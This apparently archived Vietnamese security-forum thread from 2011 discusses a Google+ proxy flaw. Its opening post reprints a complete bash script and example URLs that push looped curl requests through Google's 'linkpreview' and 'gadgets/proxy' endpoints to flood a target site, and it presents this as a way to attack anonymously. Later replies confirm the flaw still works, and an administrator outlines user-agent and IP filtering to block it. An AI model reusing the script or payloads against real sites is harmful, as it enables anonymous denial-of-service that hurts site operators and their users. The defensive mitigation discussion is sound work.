English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Make Requests Through Google Servers DDos (IHteam)!  XML
  [Discussion]   Make Requests Through Google Servers DDos (IHteam)! 02/09/2011 09:07:07 (+0700) | #1 | 246403
ga_cum06
Member
[Minus]    0    [Plus]
Joined: 04/05/2008 19:01:15
Messages: 29
Offline
[Profile] [PM]
How does it work?
The vulnerable pages are “/_/sharebox/linkpreview/“ and “gadgets/proxy?“
Is possible to request any file type, and G+ will download and show all the content. So, if you parallelize so many requests, is possible to DDoS any site with Google bandwidth. Is also possible to start the attack without be logged in G+.
Attack vectors:
The advantage of using Google and make requests through their servers, is to be even more anonymous when you attack some site (TOR+This method); The funny thing is that apache will log Google IPs.
But beware: gadgets/proxy? will send your ip in apache log, if you want to attack, you’ll need to use /_/sharebox/linkpreview/
Also the Sql injection Time attack will work using this method.
DDoS attack is just an example, do not start ddos for no reason
Pratical examples:
https://plus.google.com/_/sharebox/linkpreview/?c=<SITE>&t=1&_reqid=<RANDOM_NUMBERS>&rt=j
or
https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=<SITE>&container=focus

code
#!/bin/bash

# Bug found by #
# Simone 'R00T_ATI' Quatrini #
# Mauro 'epicfail' Gasperini #
# Site: http://www.ihteam.net #

function start {
echo "[*] Sending `echo $2` Requests..."

for a in `seq $2`
do
id=$((RANDOM%3999999+3000000))
nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
done

echo "[*] Still attacking `echo $urlclear`"
echo "[*] Sleeping for 10 Seconds"
sleep 10
start url $2 urlclear
}

echo ''
echo ' 88888888ba, 88888888ba, ad88888ba '
echo ' aa 88 `"8b 88 `"8b d8" "8b '
echo ' 88 88 `8b 88 `8b Y8, '
echo 'aaaa88aaaa 88 88 88 88 ,adPPYba, `Y8aaaaa, '
echo '""""88"""" 88 88 88 88 a8" "8a `"""""8b, '
echo ' 88 88 8P 88 8P 8b d8 `8b '
echo ' "" 88 .a8P 88 .a8P "8a, ,a8" Y8a a8P '
echo ' 88888888Y"" 88888888Y"" `"YbbdP"" "Y88888P"'
echo ''

if [ "$#" -lt 2 ]; then
echo "Usage: $0 <big file> <Requests>"
echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
echo ""

exit 0
fi

case $2 in
*[!0-9]* ) echo "$2 is not numeric" && exit 1;;
esac

echo "Attack -->" $1
match1=/
repl1=%2F
match2=:
repl2=%3A
url=$1
urlclear=$1

url=${url//$match1/$repl1}
url=${url//$match2/$repl2}

echo ""
echo "[*] Loop started! CTRL+C to stop"
echo ""

start url $2 urlclear
 

Các bác có thông tin gì thêm về việc này không. từ ngày hva bị DDos đến vietnamnet cứ đi đâu nhìn thấy chữ này là mình sôi cả tiết, các anh STL có thấy thì bỏ qua nhé. Đừng thực hành làm gì smilie)
...Ước mơ xây trường học cho trẻ em nghèo Việt Nam
[Up] [Print Copy]
  [Discussion]   Make Requests Through Google Servers DDos (IHteam)! 02/09/2011 09:25:17 (+0700) | #2 | 246407
[Avatar]
 xnohat
Moderator
Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!] [MSN]
Xác nhận là còn 1 URL còn khả năng gây tác hại

https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=http://vnexpress.net/Files/Subject/3b/a2/e5/11/clinton2.jpg&container=focus 


Google server sẽ get file trên về và hồi trả lại với đuôi *.txt
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline
[Up] [Print Copy]
  [Discussion]   Make Requests Through Google Servers DDos (IHteam)! 03/09/2011 08:45:15 (+0700) | #3 | 246433
ga_cum06
Member
[Minus]    0    [Plus]
Joined: 04/05/2008 19:01:15
Messages: 29
Offline
[Profile] [PM]
sáng nay em get thế này vẫn ổn áp
https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=/hvaonline/posts/list/39969.html&container=focus
...Ước mơ xây trường học cho trẻ em nghèo Việt Nam
[Up] [Print Copy]
  [Discussion]   Make Requests Through Google Servers DDos (IHteam)! 13/09/2011 11:19:36 (+0700) | #4 | 246993
ga_cum06
Member
[Minus]    0    [Plus]
Joined: 04/05/2008 19:01:15
Messages: 29
Offline
[Profile] [PM]
12:18 13/09/2011 vẫn chưa khắc phục lỗi trên. vẫn get về file p.txt
...Ước mơ xây trường học cho trẻ em nghèo Việt Nam
[Up] [Print Copy]
  [Discussion]   Make Requests Through Google Servers DDos (IHteam)! 17/09/2011 15:12:59 (+0700) | #5 | 247289
[Avatar]
 conmale
Administrator
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

ga_cum06 wrote:
12:18 13/09/2011 vẫn chưa khắc phục lỗi trên. vẫn get về file p.txt 


Thật ra ddos ở dạng này khó tạo dung hại tối đa bởi vì chính google sẽ giới hạn số lượng lớn requests. Đây là một dạng sử dụng google như proxy và nếu tạo một cái script để gởi hàng loạt requests như vậy thì đến một lúc nào đó sẽ bị chặn. Tuy nhiên, gần đây thấy có nhiều bạn "thử nghiệm" quá cho nên fix luôn phía HVA cho yên smilie .
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Discussion]   Make Requests Through Google Servers DDos (IHteam)! 20/09/2011 23:18:58 (+0700) | #6 | 247467
[Avatar]
 chiro8x
Member
[Minus]    0    [Plus]
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
[Profile] [PM] [Yahoo!]

conmale wrote:

ga_cum06 wrote:
12:18 13/09/2011 vẫn chưa khắc phục lỗi trên. vẫn get về file p.txt 


Thật ra ddos ở dạng này khó tạo dung hại tối đa bởi vì chính google sẽ giới hạn số lượng lớn requests. Đây là một dạng sử dụng google như proxy và nếu tạo một cái script để gởi hàng loạt requests như vậy thì đến một lúc nào đó sẽ bị chặn. Tuy nhiên, gần đây thấy có nhiều bạn "thử nghiệm" quá cho nên fix luôn phía HVA cho yên smilie


Em đang tự hỏi liệu HVA đang lọc USER-AGENT và IP của google dể không cản trở google BOT lấy thông tin nên mới xảy ra hiện tượng này smilie. Như anh conmale nói thì liệu dùng proxy trước khi tạo truy vấn tới google thì có bị google hạn chế không smilie (Em không hỏi về phía HVA).
while(1){}
[Up] [Print Copy]
  [Discussion]   Make Requests Through Google Servers DDos (IHteam)! 21/09/2011 05:36:15 (+0700) | #7 | 247472
[Avatar]
 conmale
Administrator
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

chiro8x wrote:

conmale wrote:

ga_cum06 wrote:
12:18 13/09/2011 vẫn chưa khắc phục lỗi trên. vẫn get về file p.txt 


Thật ra ddos ở dạng này khó tạo dung hại tối đa bởi vì chính google sẽ giới hạn số lượng lớn requests. Đây là một dạng sử dụng google như proxy và nếu tạo một cái script để gởi hàng loạt requests như vậy thì đến một lúc nào đó sẽ bị chặn. Tuy nhiên, gần đây thấy có nhiều bạn "thử nghiệm" quá cho nên fix luôn phía HVA cho yên smilie


Em đang tự hỏi liệu HVA đang lọc USER-AGENT và IP của google dể không cản trở google BOT lấy thông tin nên mới xảy ra hiện tượng này smilie. Như anh conmale nói thì liệu dùng proxy trước khi tạo truy vấn tới google thì có bị google hạn chế không smilie (Em không hỏi về phía HVA).  


"Hiện tượng này" là hiện tượng nào?

Dùng bất cứ cái gì để truy vấn URL trên của google để gởi hàng loạt requests đến "nạn nhân" thì đến lúc nào đó google sẽ cản bởi vì google sẽ nhận ra sự bất thường. Tất nhiên nếu núp đằng sau hàng loạt anonymous proxies để thực hiện vụ này thì google sẽ detect sự bất thường chậm hơn. Chỉ có điều, lôi đâu ra hàng loạt anonymous proxies sống dai dẳng để làm chuyện này? Đó là chưa kể trường hợp truy cập qua anonymous proxy thường chậm như rùa và có đủ thứ phiền toái khác.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Discussion]   Make Requests Through Google Servers DDos (IHteam)! 21/09/2011 18:39:31 (+0700) | #8 | 247538
[Avatar]
 chiro8x
Member
[Minus]    0    [Plus]
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
[Profile] [PM] [Yahoo!]
Hiện tượng em đang nhắc đến là việc người ta sử dụng server của google. Vì em thấy thông tin trên HVA vẫn được google bot lấy thông tin đều đặn. Việc tìm các proxy để gửi truy vấn thì không khó vì em cũng từng làm rồi. Nếu viết một chương trình tạo nhều thread thì cho dù độ trể của các proxy cao nhưng vẫn có thể tạo nhều truy vấn tới. Vấn đề phát hiện bất thường thì google làm rất tốt. Cảm ơn anh đã trả lời !.
while(1){}
[Up] [Print Copy]
  [Discussion]   Make Requests Through Google Servers DDos (IHteam)! 22/09/2011 21:13:21 (+0700) | #9 | 247613
ga_cum06
Member
[Minus]    0    [Plus]
Joined: 04/05/2008 19:01:15
Messages: 29
Offline
[Profile] [PM]
@chiro8x: có lẽ bạn chưa đọc kí bug này, đây là lỗi của server google plus chứ ko phải bot google smilie
...Ước mơ xây trường học cho trẻ em nghèo Việt Nam
[Up] [Print Copy]
  [Discussion]   Make Requests Through Google Servers DDos (IHteam)! 23/09/2011 05:43:27 (+0700) | #10 | 247622
[Avatar]
 conmale
Administrator
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Thật ra nếu xét trên mặt nguyên tắc thì một chức năng nào đó của google có thể đóng vai như một proxy để lấy thông tin. Đây là chuyện bình thường. Hàng triệu proxy trên mạng cũng làm việc này.

Lỗi đáng nói ở đây là lỗi "service bound checking" chớ không phải là lỗi chức năng. Lẽ ra google phải kiểm soát xem request xuyên qua "proxy" kia được ai đó thực thi có phải đã đăng nhập vào account G+ hẳn hòi hay chưa hoặc nghiêm trọng hơn nữa, "sharebox" chấp nhận random number và thực thi mà không hề kiểm soát gì hết.

Chuyện đáng nói ở đây là chuyện gần như 99% webmasters tin tưởng "google" và cho phép các chuỗi IP + User-agent của google access hệ thống của mình (đây cũng là hậu quả của căn bệnh SEO smilie ) cho nên mới dễ bị đập bằng phương pháp "mượn tay" google.

Trong vòng hai tuần qua, tớ nhận khá nhiều cầu cứu khắc phục tình trạng bị "ddos" kiểu này. Chứng tỏ các bạn "kiddies" lấy mấy cái script có sẵn để đi phá làng phá xóm khá nhiều. Nguyên tắc fix rất đơn giản:

1. Vẫn cho phép các chuỗi IP của google access và kiểm tra user-agent.
2. Nếu user-agent đúng là của google nhưng IP không thuộc google --> trảm đẹp.
3. Nếu user-agent và IP đúng là của google, nhưng "fetch" mà lại không đụng gì tới một URI có rss (feed) thì ---> trảm nốt.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Discussion]   Make Requests Through Google Servers DDos (IHteam)! 24/09/2011 08:07:34 (+0700) | #11 | 247651
[Avatar]
 chiro8x
Member
[Minus]    0    [Plus]
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
[Profile] [PM] [Yahoo!]

ga_cum06 wrote:
@chiro8x: có lẽ bạn chưa đọc kí bug này, đây là lỗi của server google plus chứ ko phải bot google smilie 

Có lẽ bạn không hiểu ý mình ! mình đang nói là IP của google và User-Agent của google. Và thứ anh conmale nói là căn bệnh SEO. Mình sẽ rút kình nghiệm lần sau sẽ viết bài rõ hơn.
while(1){}
[Up] [Print Copy]
  [Discussion]   Make Requests Through Google Servers DDos (IHteam)! 24/09/2011 09:38:15 (+0700) | #12 | 247655
mapthulu
Member
[Minus]    0    [Plus]
Joined: 10/06/2011 12:16:42
Messages: 28
Offline
[Profile] [PM]

conmale wrote:
1. Vẫn cho phép các chuỗi IP của google access và kiểm tra user-agent.
2. Nếu user-agent đúng là của google nhưng IP không thuộc google --> trảm đẹp.
3. Nếu user-agent và IP đúng là của google, nhưng "fetch" mà lại không đụng gì tới một URI có rss (feed) thì ---> trảm nốt. 


Cảm ơn anh vì gợi ý, ở điều 1 và 2 có thể gộp chung lại thành 1 Rule [chain] trong Mod_Security
Còn điều 3 em sẽ tìm hiểu thêm.

Bạn nào cần xem tại đây: /hvaonline/readingRoom/item/237042.html
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|